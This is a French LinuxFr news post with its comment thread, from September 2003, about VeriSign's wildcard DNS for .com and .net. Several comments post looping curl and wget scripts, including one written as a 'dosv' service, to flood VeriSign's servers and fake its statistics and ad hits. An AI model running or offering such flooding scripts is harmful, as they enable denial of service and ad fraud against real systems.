VeriSign détruit l'un des fondements d'Internet

Posté par Boa Treize (site web personnel) le 17 septembre 2003 à 16:51. Modéré par Nÿco.

Étiquettes :

sept.

2003

Depuis quelques heures maintenant, VeriSign a mis en place une adresse IP joker pour les domaines .com et .net. Cela signifie en pratique qu'il n'existe plus de « nom de domaine inconnu » : tout domaine non-répertorié est résolu comme étant le serveur 64.94.110.11 de VeriSign.

Qu'est-ce que ça affecte ? Tout.

MISE À JOUR : une pétition est disponible en ligne. Vous êtes encouragés à la lire et à y participer. Au niveau du web, tout nom de domaine mal tapé entraîne donc maintenant l'utilisateur sur le SiteFinder de VeriSign (avec cookie, licence d'utilisation (!), et publicités) au lieu de déclencher l'affichage d'une page d'explication spécifique au navigateur.

Au niveau des courriels, tout nom de domaine mal tapé envoie donc maintenant le courriel au serveur de VeriSign, sans qu'aucune indication d'erreur ne puisse être transmise à l'utilisateur, et sans que l'on sache d'ailleurs ce qu'ils font du courriel (VeriSign est en bonnes relations avec le gouvernement américain).

Au niveau des spams, il devient inutile de tester si le domaine de l'expéditeur est valide, puisque la réponse du système DNS sera toujours positive.

Aujourd'hui est un jour particulièrement noir pour Internet. Le seul espoir est qu'une telle folie entraîne un tollé de la part de la communauté dans son ensemble (y compris Microsoft, puisque son propre service de recherche de noms de domaines est rendu inopérationnel), et que VeriSign doive faire marche arrière. En attendant, je vous suggère de rediriger toute requête vers l'adresse IP 64.94.110.11 sur l'adresse IP 127.0.0.1.

Aller plus loin

Exemple (136 clics)
/. (27 clics)
Le mail de VeriSign (43 clics)
L'analyse de NetEconomie (53 clics)
La pétition en ligne (43 clics)
Contournements du problème (dont un patch de l'ISC qui apporte une solution propre) (36 clics)

# ça va saturer non ??

Posté par Olivier BENDRIES (site web personnel) le 16 septembre 2003 à 17:33. Évalué à 10.

j'dis que ça ne va tarder à saturer chez verisign !
- [^] # Re: ça va saturer non ??
  
  Posté par Loic Jaquemet le 16 septembre 2003 à 17:37. Évalué à 4.
  
  gagné .
  - [^] # Re: ça va saturer non ??
    
    Posté par ramzez le 16 septembre 2003 à 17:54. Évalué à 5.
    
    ce qui n'enleve rien au fait qu'on n'a pas le unknow host qu'on devrait avoir quand on se trompe (on a un timeout)
    donc le problème reste entier pour nous
    je me demande ce qui a bien pu passer par la tete des gens qui ont décidé ça !
    - [^] # Re: ça va saturer non ??
      
      Posté par Sébastien Koechlin le 16 septembre 2003 à 17:58. Évalué à 10.
      
      Ca tiens en un caractère : $
      - [^] # Re: ça va saturer non ??
        
        Posté par ramzez le 16 septembre 2003 à 18:12. Évalué à 3.
        
        bah justement, je trouve bizarre qu'il n'y est pas dans leur rang quelqu'un de censer pour leur expliquer que de toute façon leurs serveurs ne tiendront jamais la charge ...
        donc là les dollars, sur ce coup ...
        
        [^] # Re: ça va saturer non ??
        
        Posté par Stéphane Graber le 16 septembre 2003 à 18:48. Évalué à 4.
        
        Je viens d'essayer en entrant une adresse bidon en .com
        Resultat : l'ip est bien 64.94.110.11 mais absolument aucune réponse de leur serveur.
        Est-il déjà saturé ?
        Ce cerait vraiment commique que leur serveur lache le premier jour :)
        
        [^] # Re: ça va saturer non ??
        
        Posté par Émilien Kia (site web personnel) le 16 septembre 2003 à 18:53. Évalué à 1.
        
        ha toi aussi ? :)
        Un jour libre ?
        
        [^] # Re: ça va saturer non ??
        
        Posté par Virgile le 17 septembre 2003 à 09:33. Évalué à 7.
        
        Voilà ce qui arrive quand on confie la gestion d'intérêt publiques ou communs à des entreprises privées et non à des structures ou organisation moisn "interessées" ...
        Pauvre monde :/
        
        [^] # Re: ça va saturer non ??
        
        Posté par Jul (site web personnel) le 17 septembre 2003 à 10:14. Évalué à 9.
        
        C'est l'ICANN qui leur a déléguer leur patente. Ils ont failli la retirer, mais le gouvernement des US à fait pression sur l'ICANN (dont le statut est une association à but non lucratif de droit californien) pour qu'ils ne déshéritent pas un fleuron de l'industrie US. Il s'agissait d'un classique chantage à l'emploi. Je suis assez pessimiste quand aux réactions de l'ICANN. Je crois qu'ils vont laisser pisser une fois de plus.
        
        Verisign spammeur et arracheur de dent : http://libroscope.org/article.php3?id_article=6(...)
        
        Verisign infoutu de remplir une base whois : http://libroscope.org/article.php3?id_article=24(...)
        
        Il faut aussi se reposer une fois de plus la question de l'impartialité des institutions qui gouvernent internet, et de leur indépendance vis à vis des gouvernements.
    - [^] # Re: ça va saturer non ??
      
      Posté par N-Mi le 16 septembre 2003 à 17:58. Évalué à 7.
      
      Tu te rends compte du pognon qu'il y a à se faire?
      
      Imagine que toutes les personnes dans le monde rentrant une adresse éronnée tombent sur une page affichant une bannière de pub, combien de millions serait prêt à payer un annonceur qui veut toucher le plus de monde possible?
      - [^] # Re: ça va saturer non ??
        
        Posté par ramzez le 16 septembre 2003 à 18:14. Évalué à 1.
        
        je m'en rends compte, je m'interrogeais juste sur leur manque de prévoyance quant à la charge nécessaire ... enfin ils font peut-être une démo aux annonceurs interessé, en attendant les-dis sous-sous leur permettant de monter des serveurs qui tiennent la route ... c'est possible
      - [^] # Re: ça va saturer non ??
        
        Posté par Pooly (site web personnel) le 16 septembre 2003 à 22:33. Évalué à 2.
        
        Et pense à celui qui arriveras à leur fournir un serveur qui tiennent la charge....
        non, sérieusement, c'est pitoyable leur attitude.
    - [^] # Re: ça va saturer non ??
      
      Posté par Prosper le 16 septembre 2003 à 18:03. Évalué à 5.
      
      http://story.news.yahoo.com/news?tmpl=story&u=/washpost/2003091(...)
      
      VeriSign's Site Finder could easily generate more than $100 million a year in profits for the VeriSign, according to Mark Lewyn, the chairman of Reston,
      - [^] # Re: ça va saturer non ??
        
        Posté par Olivier BENDRIES (site web personnel) le 16 septembre 2003 à 19:14. Évalué à 8.
        
        Je crois qu'avec cette petite somme ya dequoi acheter quelques S390 pour enquilleraient tout le "tarif reseau d'erreurs " et afficher quelques .swf de pubs... et encore p'être juste quelques .gifs.
        
        Plus serieusement, je vois un pb parmi d'autre:
        Je redirige mes mails vers mon DNS dynamique. à chaque coupure IP, la mise à jour prendre facile 5mins. Ya encore quelques heures, je me fouttai de ces 5mins de coupures puisque mes mails tournaient sur le reseau le temps de d'arriver. Mais Là !! Les mails qui pourraient arriver durant les "pannes DNS" comme nous en avons tous serons relayaient directement par Verisign ! Merci la confiance !!
        
        Ils fouttent en l'air une parti du protocol de transfert des mails !
        Et je ne regarde que mon petit nombril.... mais j'imagine que c'est le même pb avec tout les besoins spéfi sur chaque protocoles de tous un chacun !!
        
        [^] # Re: ça va saturer non ??
        
        Posté par Boa Treize (site web personnel) le 16 septembre 2003 à 19:24. Évalué à 1.
        
        En fait, ils seront rejetés avec une erreur "550 Nom de domaine inexistant". Ce qui est sûr, c'est qu'ils ne tourneront plus en rond en attendant que la mise à jour se fasse.
        
        [^] # Re: ça va saturer non ??
        
        Posté par Anonyme le 16 septembre 2003 à 19:29. Évalué à 2.
        
        Ils seront rejeté mais peut-être aussi copiés et analysés...
        
        [^] # Re: ça va saturer non ??
        
        Posté par Boa Treize (site web personnel) le 16 septembre 2003 à 19:36. Évalué à 0.
        
        Pour l'instant, non : les mails sont rejetés. Mais ils peuvent tout à fait garder une copie de l'adresse de l'expéditeur et du destinataire, ou bien sûr, mettre un vrai serveur mail ultérieurement (enfin là, au niveau légal, ce serait du suicide).
        
        [^] # Re: ça va saturer non ??
        
        Posté par MrTout (site web personnel) le 16 septembre 2003 à 19:44. Évalué à 0.
        
        Pourquoi « pour l'instant non » ?
        
        [^] # Re: ça va saturer non ??
        
        Posté par Boa Treize (site web personnel) le 17 septembre 2003 à 11:04. Évalué à 4.
        
        Parce que je suis allé faire un tour sur leur serveur de mail pour voir comment il fonctionne et que pour l'instant (c'est à dire à l'heure actuelle d'aujourd'hui, au moment où je fais mes tests) il prend les trois premiers messages du client (c'est à dire, pour un client standard, le HELO, le FROM et le RCPT) et ensuite il renvoie un message d'erreur. Donc il ne récupère rien du mail lui-même (ni les en-têtes, ni le corps). Et je dis bien pour l'instant car comme les machines appartiennent à VeriSign, ils peuvent changer à tout moment le serveur de mail qui tourne dessus et se mettre à accepter des messages quand ils en ont envie.
        
        [^] # Re: ça va saturer non ??
        
        Posté par Romeo le 17 septembre 2003 à 11:21. Évalué à 5.
        
        Le from sufit aux spammeurs...
        
        [^] # Re: ça va saturer non ??
        
        Posté par Arnaud le 17 septembre 2003 à 19:35. Évalué à 2.
        
        Oui, le FROM suffit. Et puis de toute façon, le TO est inutilisable, puisque le domaine est invalide (puisqu'on tombe sur la bécane de verisign).
        
        [^] # Commentaire supprimé
        
        Posté par Anonyme le 18 septembre 2003 à 11:48. Évalué à 0.
        
        Ce commentaire a été supprimé par l’équipe de modération.
        
        [^] # Re: ça va saturer non ??
        
        Posté par Benoît Déchamps (site web personnel) le 16 septembre 2003 à 19:49. Évalué à 3.
        
        Si ce n'est pas un .com ou un .net (comme dyndns.org par exemple) ça devrai continuer à fonctionner comme avant non ?
        
        [^] # Re: ça va saturer non ??
        
        Posté par Olivier BENDRIES (site web personnel) le 16 septembre 2003 à 21:37. Évalué à 2.
        
        ouais.. petite consolation:
        Si je passe de mondns.no-ip.com à mondns.no-ip.org je serai pas emmerder !!
        
        petite haine:
        mondns.no-ip.org a déjà été reserver par qqu'un... il va falloir trouver autrechose =(
        
        Quelle bande dem* chez verisign !!
        Et au fait !! ça en est où pour les serveurs de caches DNS des provideurs ? ça n'a pas encore laché ?¿?
        
        [^] # Re: ça va saturer non ??
        
        Posté par ours Ours (site web personnel) le 17 septembre 2003 à 09:54. Évalué à 0.
        
        ben non
        c'est seulement les noms de domaine non achetés qui seront redirigés
        
        [^] # Re: ça va saturer non ??
        
        Posté par Benoît Sibaud (site web personnel) le 17 septembre 2003 à 17:00. Évalué à 1.
        
        Non ça concerne aussi ceux qui sont achetés et non utilisés (sans entrée DNS pour être précis) et ceux qui sont en cours d'achat.
        
        [^] # Re: ça va saturer non ??
        
        Posté par nakan (site web personnel) le 17 septembre 2003 à 13:40. Évalué à 1.
        
        Non, à mon avis, tes mails vont être dirigés vers l'ancienne adresse IP. Comme elle n'existe pas, il vont attendre une IP valide, et arriver sur ton serveur lors de la mise à jour DNS. Je pense pas que VeriSign les auras...
        
        [^] # Re: ça va saturer non ??
        
        Posté par farib le 16 septembre 2003 à 19:25. Évalué à 4.
        
        bah non, le nom est réel et associé à une ip !
        
        [^] # Re: ça va saturer non ??
        
        Posté par MeiK le 16 septembre 2003 à 22:27. Évalué à 2.
        
        Hmm si par exemple t'es chez wanadoo et t'as un truc de dyndns, le mail sera routé donc sur ton ancienne ip qui n'appartient pas a verisign, non ? il y a des chances que cette ancienne ip que t'avais soit meme reprise dans les 5 minutes (on sait jamais) par un autre gars. Bon là je parle pour les particuiers en effet...dites moi si je me trompe.
        
        [^] # Re: ça va saturer non ??
        
        Posté par Mr F le 16 septembre 2003 à 23:44. Évalué à 4.
        
        Tu ne te trompe pas, dans son cas le mail sera envoyé soit a une adresse ip qui ne ping pas, soit une adresse qui n'a pas de serveur mail, soit une adresse qui refuse les mails du domaine, soit un serveur qui les acceptent tous (ça peut arriver), mais rien ne passera chez Verisign.
        
        [^] # Re: ça va saturer non ??
        
        Posté par C2RIK le 17 septembre 2003 à 05:22. Évalué à 5.
        
        En fait ça ne change rien pour toi.
        Par exemple si ton fournisseur d'IP dynamique est no-ip.com (je prends cet exemple car il est en .com), la requete sur le DNS de verisign renverra toujours sur le DNS de no-ip.com qui aura toujours dans sa base la dernière IP que tu as enregistrée.
        La couillonade de verisign ne marche que sur les domaines en .com et .net non enregistrés comme verisignsucksgoats.com.
        
        Bon, j'espère avoir été assez clair je vais me coucher...
        
        [^] # Re: ça va saturer non ??
        
        Posté par Olivier BENDRIES (site web personnel) le 17 septembre 2003 à 08:17. Évalué à 3.
        
        exact !! très lucide à 5h30 du mat !! effectivement:
        
        - le temps d'un changement d'Ip, la resolution dns se fait toujours (mondns.no-ip.com --> ma.recente.ancienne.adresse ), ma machine est juste injoinable. (j'ai l'habitude !!)
        
        - la récuperation des erreurs faite par verisign ne peut pas s'appliquer dans le cas d'une erreur de frappe ou de timeout "mondomaineperso.no-ip.com" puisque no-ip à déjà mis en place un wildcard pour ses domaines. et ça doit être le cas pour les autres services de dns dynamique.
        
        - et un truc à part: Le moteur de recherche Msn qui exploitait ~ le même principe pourra toujours fournir ses services pour les adresses en *.org ou en *.info. ça pourrai même continuer a nous faire un peu de pub (linusfr.org sous IE ça redirige ici , non ?¿?) Sympa !!
- [^] # Re: ça va saturer non ??
  
  Posté par Nicolas Melay le 16 septembre 2003 à 17:39. Évalué à 3.
  
  Ah, je commence à mieux comprendre nos problèmes de DNS de tout à l'heure. :P
  
  Oui je relayais tout et n'importe quoi vers Internet, honte à moi...
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par mouskouyouss le 16 septembre 2003 à 17:37. Évalué à 4.

Deux documents de Verisign qui peuvent être intéressants (en anglais):
L'implementation de leur wildcard:
http://www.verisign.com/resources/gd/sitefinder/implementation.pdf(...)

et leurs recommandations
http://www.verisign.com/resources/gd/sitefinder/bestpractices.pdf(...)

bon, je ne sais pas ce que ça vaut, je ne les ai pas encore lu.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par mouskouyouss le 16 septembre 2003 à 17:42. Évalué à 1.
  
  ah désolé, mais le mail de verisign les mentionne déjà.
  Je ne l'avais pas vu.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par pef le 16 septembre 2003 à 17:38. Évalué à 10.

A noter qu'il existe un patch pour djbdns pour éviter ce fonctionnement :

http://tinydns.org/djbdns-1.05-ignoreip.patch(...)

Quelqu'un connait une url pour une pétition ou un truc du genre ?
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par daggett le 16 septembre 2003 à 17:48. Évalué à 6.
  
  Quelqu'un connait une url pour une pétition ou un truc du genre ?
  A priori tu tapes n'importe quelle url, et tu devrais atterir à une page où tu peux exprimer ton mécontentement ;)
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par Da Scritch (site web personnel, Mastodon) le 16 septembre 2003 à 20:53. Évalué à 4.
    
    while true ; do curl -A "suckers" http://verisignwildcard.112.2O7.net/b/ss/verisignwildcard/1/G.2-Xpd(...) ; echo -n '.' ; done
    
    cette image sert à des fins satistiques dans leur page. si tout le monde lance la même requète (si possible en IP non fixée), cela va leur fausser leurs stats. Et peut être leur faire comprendre leu connerie
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par Yann Forget le 16 septembre 2003 à 23:25. Évalué à 5.
      #!/bin/bash # Version 0.01 # Licence GPL unset http_proxy; verisign="http://verisignwildcard.112.2O7.net/b/ss/verisignwildcard/1/G.2-Xpd(...)"; dosv() { /bin/su - login -c " \ while true ; do curl -A 'suckers' $verisign ; echo -n '.' ; done" } case "$1" in start) dosv #& ;; stop) /usr/bin/killall curl ;; reload|restart|force-reload) $0 stop $0 start ;; *) echo "Usage: $0 {start|stop|restart|force-reload}" >&2 exit 1 ;; esac exit 0
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Olivier BENDRIES (site web personnel) le 16 septembre 2003 à 23:56. Évalué à 1.
        
        ça tourne, enfin ça " . . . . . . . . . . . . . . . . . . . . . . . . . . "
        Quelle est la finalité exacte ? tu fausse les stats d'un des DNS de Verisign via le download en continu d'un gif caché ?¿?
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Da Scritch (site web personnel, Mastodon) le 17 septembre 2003 à 00:38. Évalué à 5.
        
        Fausser complètement les statistiques navigateurs (marche mieux si 'est lancé d'une ip dynamique, ou derrière un très gros proxy). Et donc par la même, créer un faux "engouement" pour leur page.
        À l'avenir, faire un max de hits dans les pubs (avec un wget -l 2), histoire de faire crâcher un maximum les publicitaires clients avec un retour sur investissement ridicule, pour mieux mettre à l'amende. C'est complètement terroriste, mais bon. "Suckers" est à double sens ;)
        
        Pourquoi cette url précisément ? Tout simplement parce qu'elle est présente dans la page comme image invisible, donc compteur de statistique.
        Mais je ne suis pas sûr de mon code : il se base sur la partie non-javascript. Si un furieux est capable d'analyse ce que fait exactement le javascript, pour voir s'il n'y a pas d'autre image de ce genre, nous sommes preneur.
        
        Bravo à Yann Forget pour sa mise au carré. Excellent !
        
        Communiquez un max !
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par choocroot le 17 septembre 2003 à 12:22. Évalué à 7.
        
        Heu je connais pas bien curl mais l'URL que tu donnes renvoie un «302 Redirect», donc si tu ne fetches pas la nouvelle `Location:' ça sert a rien.
        
        Sinon, il est preferable, si on est administrateur et que l'on est responsable du DNS/reseaux, de mettre à jour son serveur DNS patché pour renvoyer NXDOMAIN aux requêtes qui donneraient `64.94.110.11' comme réponse.
        
        L'ISC (http://www.isc.org(...))(qui édite Bind) est en train de plancher sur le problème. Un patch officiel devrait sortir bientôt (s'il n'est pas déjà sortie). L'idée (corriger moi si c'est faux) qu'il auraient retenus n'est pas de «banir» sur l'IP, mais plutôt de faire qu'un résultat de type `A' de la part d'un serveur root DNS ne soit pas pris en compte. En gros les serveurs root DNS ne doivent faire que de la délégation, et ne pas stocker/diffuser des IP de nom de machines complètes.
        
        Je viens de verifier sur leur site, et il y a une version «BIND Version 9.2.3rc2» beta toute fraiche qui semble contenir un fix de ce genre :
        - http://marc.theaimsgroup.com/?l=bind9-users&m=106378710318706&a(...)
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par vazco le 17 septembre 2003 à 13:46. Évalué à 9.
        
        Un patch officiel devrait sortir bientôt (s'il n'est pas déjà sortie). L'idée (corriger moi si c'est faux) qu'il auraient retenus n'est pas de «banir» sur l'IP, mais plutôt de faire qu'un résultat de type `A' de la part d'un serveur root DNS ne soit pas pris en compte. En gros les serveurs root DNS ne doivent faire que de la délégation, et ne pas stocker/diffuser des IP de nom de machines complètes.
        
        Voilà une solution élégante !
        
        Ça obligera juste tous les administrateurs de DNS à patcher ou à mettre à jour pour retrouver un comportement normal. Merci qui ?
        
        Moralité de l'histoire :
        - des super décideurs ont inventé un super moyen de se faire super plus de pognon (peut-être) ;
        - le super moyen fait chier tout le monde mais yzenonrienapaitai ;
        - tout le monde cherche un moyen de passer outre le super moyen ;
        - trouve ;
        - la situation redevient comme avant sauf que tout le monde a perdu du temps et est énervé.
        
        Ça doit être ce qu'on appelle en décidien « une situation win-win ».
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par maston28 le 17 septembre 2003 à 14:48. Évalué à 2.
        
        une ou deux idées...
        - gspoof qui envoie des paquets et des paquets sans délai...ca marche mais ca viande la connection, à utiliser la nuit :)
        - while true ; do wget --delete-after http://$(head(...) /dev/random | md5sum | cut -f1 -d " ").com ; done (merci fred)
        - while true; do
        wget --delete-after http://verisign-suckers.com(...) &
        sleep 1
        killall wget
        done # (merci scriptfanix...)
        
        and so on...
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par chooops le 20 septembre 2003 à 22:43. Évalué à 1.
  
  Quelqu'un connait une url pour une pétition ou un truc du genre ?
  http://www.petitiononline.com/icanndns/petition.html(...)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Rossel Olivier le 16 septembre 2003 à 17:40. Évalué à 5.

A priori, le joker est en place pour les enregistrements DNS de type A. Pas pour les enregistrements de type MX.

Je me demande comment fonctionne un serveur SMTP.
Se base t'il sur le champ MX et rien que sur le champ MX pour decider ou relayer des mails?

Il me semble qu'une adresse d'envoi de type xxx@foo.bar
envoyait directement a la machine foo.bar si elle existe, meme si son champ MX pointe vers ailleurs.
Dans ce cas, le serveur SMTP n'a t'il pas fait une resolution de type A au lieu de faire une resolution de type MX.

Toute explication (courte et claire) d'un guru est bienvenue.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Prosper le 16 septembre 2003 à 17:43. Évalué à 9.
  
  la rfc est tres claire la dessus c est A ou MX , cf le probleme avec wanadoo : http://linuxfr.org/2003/03/14/11695.html(...)
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Obsidian le 16 septembre 2003 à 17:44. Évalué à 5.
  
  Egalement, toute explication (courte et claire) d'un utilisateur éclairé sur la signification des type A et MX sera fort bien reçue.
  
  Désolé pour cette question de débutant (a priori), mon domaine de prédilection est tout autre.
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par Rossel Olivier le 16 septembre 2003 à 17:52. Évalué à 8.
    
    Lors d'une requete DNS, on peut demander:
    la valeur du champ A lors d'une resolution classique 'quelle IP pour le nom foo.bar'
    ou
    la valeur du champ MX lors d'une resolution 'quel serveur de mail pour le nom foo.bar'.
    
    C'est assez court?
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par Benoît Bailleux (Mastodon) le 17 septembre 2003 à 07:47. Évalué à 2.
      
      Oh oui, c'est assez court et clair (pour moi, pauvre béotien).
      Et je suppose que
      - A = Address
      et
      - MX = Mail Exchanger
      
      Merci Google Glossary (http://labs.google.com/glossary(...))
      - [^] #
        
        Posté par Francois Revol (site web personnel) le 17 septembre 2003 à 15:27. Évalué à 2.
        
        béotien comme dans BeOS ?
        \o/ je suis pas seul dans l'univers \o/
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par Prosper le 16 septembre 2003 à 17:55. Évalué à 4.
    
    en gros pour faire simple , toto.domaine.tld est associé a un A ( une ip ) ou un CNAME ( une "redirection" ) , la zone qui gere toto.domaine.tld peut aussi avoir un MX , le champs MX renseigne qui accepte les mails pour toto.domaine.tld ( tu peux le savoir en faisant host -t MX toto.domaine.tld ) , ca sert si par exmple tu veux deleguer la gestion des mails sur une autre machine . Ce champ MX n est pas obligatoire , c est pour ca que dans la rfc2821 qui concerne les smtps ou serveurs de mail (http://www.faqs.org/rfcs/rfc2821.html(...)) , il est clairement expliqué ( 3.6 Domains ) que les mails doivent accepter les mails venant d un domaine repondant a un A ou un MX .
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par Julien Wajsberg le 16 septembre 2003 à 19:40. Évalué à 1.
    
    Lorsque tu envoies un mail a pif@gadget.com, ton serveur de mail doit savoir à quel serveur envoyer ce mail, donc quel serveur accepte les mails pour le domaine gadget.com.
    
    Si une entrée MX existe pour ce domaine, c'est l'ip/hostname associé à ce MX qui est utilisé.
    Sinon, c'est l'entrée A.
    Sinon c'est host not found :)
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par Boa Treize (site web personnel) le 16 septembre 2003 à 19:55. Évalué à 3.
      
      sauf que maintenant, il n'y a plus de « host not found » pour les .com et les .net.
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par William Steve Applegate (site web personnel) le 17 septembre 2003 à 15:30. Évalué à 1.
        
        Pour les .com/.net _qui n'ont pas de serveurs de noms déclarés_. Pour ceux qui ont des NS (et pas de wildcard, ha ha ha) le "host not found" peut toujours arriver. Mais ça n'en reste pas moins une décision débile, j'en conviens parfaitement.
        Envoyé depuis mon PDP 11/70
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par Prosper le 16 septembre 2003 à 21:43. Évalué à 1.
      
      sauf que la tu confonds ce dont on parle : c est entrée de serveur que le check du domaine est fait pas en sortie
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Julien Wajsberg le 17 septembre 2003 à 12:05. Évalué à 1.
        
        oui mais non
        je répondais juste à la question du gars qui demandait ce qu'étaient les types MX et A... et je pense que ma réponse convenait, non ? :) (sachant que ce dont tu parles avait déjà été dit, j'allais pas le répéter)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par N-Mi le 16 septembre 2003 à 17:41. Évalué à 2.

Je viens d'essayer d'aller sur http://www.fzaufvuyazvfuyazu.com(...) , et Mozilla me dit qu'il n'arrive pas à se connecter à ce site. On dirait que c'est déjà saturé...
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par mathic le 16 septembre 2003 à 18:51. Évalué à 1.
  
  c'est marrant, on tape n'importe quoi, et on tombe sur leur serveur...
  Mais comment elle peut tenir cette machine ??
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par Stéphane Graber le 16 septembre 2003 à 19:13. Évalué à 2.
    
    Elle tien pas :)
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par j le 16 septembre 2003 à 20:34. Évalué à -3.
      
      C'est normal elle tourne avec Apache.
      
      Ils ont du pognon, ils auraient au moins pu acheter Zeus pour tenir la charge.
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par RB le 17 septembre 2003 à 04:25. Évalué à 6.
    
    comment y tient google ? comment y tient yahoo ? comment y tient microsoft ? comment y tient slashdot ?
    
    iC'est tout simplement IN-CRO-YA-BLE !
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par Blackknight (site web personnel, Mastodon) le 17 septembre 2003 à 10:20. Évalué à 2.
      
      Yahoo runs FreeBSD ;-)
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par Blackknight (site web personnel, Mastodon) le 17 septembre 2003 à 10:49. Évalué à -1.
      
      Yahoo runs FreeBSD
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Blackknight (site web personnel, Mastodon) le 17 septembre 2003 à 10:50. Évalué à -1.
        
        P....n de cache de m...e, v'la que je cause en double
# QUEUE FER

Posté par Annah C. Hue (site web personnel) le 16 septembre 2003 à 17:42. Évalué à 10.

Leur adresse 64.94.110.11 risque de changer facilement, donc pour l'instant null-router ça n'est qu'un pis aller.

Bon, le problème est que ce sont les cons qui ont pris le contrôle des noms de domaines. Un nom de domaine n'est qu'une pauvre entrée dans un base de donnée, c'est rien de plus, mais les avocaillons à la recherche du profit maximum tentent de légiférer sur tout ce qui marche sans eux, ce qui a pour effet de rendre payant un truc qui était gratuit avant.

Il est donc peut-être temps de quitter ces gros voleurs de l'icann, et d'aller voir des root dns moins voleurs qu'eux, comme http://www.opennic.unrated.net/(...) qui semble avoir une gestion démocratique, pas comme ces sales escrocs désignés par l'état américain pour espionner le net.

Si quelqu'un a des retours d'expériences sur ces espaces de noms alternatifs, ça m'intéresse.
- [^] # Re: QUEUE FER
  
  Posté par ramzez le 16 septembre 2003 à 18:11. Évalué à 1.
  
  lien mort pour moi :/ (timeout mais le domaine est connu ...tiens donc ...)
  - [^] # Lien actif.
    
    Posté par Rafael Pinilla le 16 septembre 2003 à 20:50. Évalué à 2.
    
    Voici l'adresse équivalente du cache google:
    http://216.239.59.104/search?q=cache:3R0VLSZnRTYJ:www.opennic.unrat(...)
    
    Le site est même assez rapide.
- [^] # Re: QUEUE FER
  
  Posté par Code34 (site web personnel) le 16 septembre 2003 à 20:10. Évalué à 2.
  
  Les dns de opennic fonctionnent bien mais ça ne fait que diminuer les problemes car ils n'ont pas autorité sur les .com .
  
  En gros, si tu tappes www.letartenpion.com ou autres friandises, les dns de opennic te renvoient sur verigsign ;(
  - [^] # Re: QUEUE FER
    
    Posté par Code34 (site web personnel) le 16 septembre 2003 à 20:22. Évalué à 1.
    
    J'ai oublié de preciser que par contre si tu rentres une url avec un tlb bidon du genre:
    
    http://www.monurl.bid(...)
    
    ça te renvoit un could not be found, le comportement du dns redevient donc normal ;)
    
    Pour ceux qui veulent essayer dans /etc/resolv.conf:
    
    nameserver 62.236.208.158
    nameserver 213.185.37.13
    - [^] # Re: QUEUE FER
      
      Posté par gebura le 17 septembre 2003 à 19:10. Évalué à 1.
      
      c est simpa mais bon si toutes mes requettes dns doivents traverser l attlantique avant d aboutir...
- [^] # Re: QUEUE FER
  
  Posté par _seb_ le 17 septembre 2003 à 11:45. Évalué à 1.
  
  Heu ça marche vraiment ses serveurs roots de remplacement ?
  
  Comment font il pour detecter de nouveaux domains ? A qui ils demandent puisque c'est l'ICANN qui les gère.
  
  Ils font une requete DNS sur les serveurs roots pour verifier que le domain exite :)
  - [^] # Re: QUEUE FER
    
    Posté par Matthieu BENOIST le 17 septembre 2003 à 17:55. Évalué à 1.
    
    n'en, c'est un jocker, $.com.
    Il peut tout à fait y avoir des URL acheté non trouvée, suffit qu'elle ne soit présente dans aucun DNS. Du coup, ils peuvent la choper.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Sébastien Koechlin le 16 septembre 2003 à 17:43. Évalué à 10.
Pour le courrier, il y a une petite nuance. Il y a visiblement un faux serveur de mail sur cette machine qui réponds que l'utilisateur n'existe pas, enfin, qui semble avoir été conçu pour répondre cela :
```
$ telnet 64.94.110.11 smtp
Trying 64.94.110.11...
Connected to 64.94.110.11.
Escape character is '^]'.
220 snubby1-wceast Snubby Mail Rejector Daemon v1.3 ready
HELO plop.org
250 OK
MAIL From: <test@plop.org>
250 OK
RCPT To: <postmaster@somenowhere.com>
550 User domain does not exist.
221 snubby1-wceast Snubby Mail Rejector Daemon v1.3 closing transmission channel
Connection closed by foreign host.
$
```
Le serveur s'appelle "Mail Rejector Daemon" et il me dit que l'email n'existe pas. Le problème, c'est que visiblement ce robot est TRES TRES bête :
```
$ telnet 64.94.110.11 smtp
Trying 64.94.110.11...
Connected to 64.94.110.11.
Escape character is '^]'.
220 snubby1-wceast Snubby Mail Rejector Daemon v1.3 ready
Plop
250 OK
Coin
250 OK
PAN!
550 User domain does not exist.
Zut
250 OK
\_o<
221 snubby1-wceast Snubby Mail Rejector Daemon v1.3 closing transmission channel
Connection closed by foreign host.
```
En fait, il se contente de répondre "250 OK" aux deux premières questions, qui sont normalement HELO et MAIL From, et "550" à la suivante.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
 
 Posté par Rossel Olivier le 16 septembre 2003 à 17:47. Évalué à 5.
